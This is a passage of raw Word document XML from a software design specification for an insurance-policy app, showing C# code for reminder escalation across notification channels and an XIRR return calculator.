      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2  Escalation Logic — ReminderService.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">private static readonly Dictionary&lt;int, NotificationChannel[]&gt; EscalationMatrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    = new()</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 30,  new[] { NotificationChannel.InApp, NotificationChannel.Email } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        { 15,  new[] { NotificationChannel.InApp, NotificationChannel.Email } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        { 7,   new[] { NotificationChannel.InApp, NotificationChannel.Email,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       NotificationChannel.WhatsApp } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        { 3,   new[] { NotificationChannel.InApp, NotificationChannel.Email,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       NotificationChannel.WhatsApp, NotificationChannel.SMS } },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        { 0,   new[] { NotificationChannel.InApp, NotificationChannel.Email,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       NotificationChannel.WhatsApp, NotificationChannel.SMS,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       NotificationChannel.Push } },</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public async Task&lt;int&gt; RunReminderScanAsync()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Check for active snoozes before creating reminder events:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var snoozedPolicyIds = await _context.ReminderSnoozes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .Where(s =&gt; s.SnoozeUntil == null || s.SnoozeUntil &gt; DateTime.UtcNow)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .Select(s =&gt; s.PolicyId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .ToListAsync();</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 Exclude snoozed policies from scan results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    // ... rest of existing scan logic ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec4-4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4  IRR / XIRR Calculator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4.1  New Service — IrrCalculatorService.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public class IrrCalculatorService</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    /// &lt;summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    /// Computes XIRR using Newton-Raphson iteration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    /// cashflows: negative = outflow (payments), positive = inflow (maturity).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    /// &lt;/summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    public double CalculateXIRR(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        List&lt;(DateTime date, decimal amount)&gt; cashflows,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        double guess = 0.1,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        int maxIterations = 100)</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var dates = cashflows.Select(c =&gt; c.date).ToList();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var amounts = cashflows.Select(c =&gt; (double)c.amount).ToList();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        var t0 = dates[0];</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double rate = guess;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        for (int i = 0; i &lt; maxIterations; i++)</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double f  = amounts.Select((a, j) =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                a / Math.Pow(1 + rate, (dates[j] - t0).TotalDays / 365.0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            ).Sum();</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double df = amounts.Select((a, j) =&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                -((dates[j] - t0).TotalDays / 365.0) * a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                    / Math.Pow(1 + rate, (dates[j] - t0).TotalDays / 365.0 + 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            ).Sum();</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double newRate = rate - f / df;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (Math.Abs(newRate - rate) &lt; 1e-7) return newRate;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            rate = newRate;</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return rate;</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public IrrResultDto GetPolicyIRR(Policy policy)</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var cashflows = new List&lt;(DateTime, decimal)&gt;();</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 All premium payments are outflows (negative)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        // Use payment history if available, else project from start date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (policy.Payments?.Any() == true)</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cashflows.AddRange(policy.Payments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                .Select(p =&gt; (p.PaymentDate, -p.Amount)));</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 Maturity amount is inflow (positive)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (policy.MaturityDate.HasValue &amp;&amp; policy.TotalMaturityAmount &gt; 0)</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cashflows.Add((policy.MaturityDate.Value,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                policy.TotalMaturityAmount ?? 0));</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if (cashflows.Count &lt; 2) return new IrrResultDto { IsCalculable = false };</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var xirr = CalculateXIRR(cashflows);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        return new IrrResultDto</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IRR = Math.Round(xirr * 100, 2),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            IsCalculable = true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            BenchmarkFD  = 6.8,   // Current SBI FD rate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
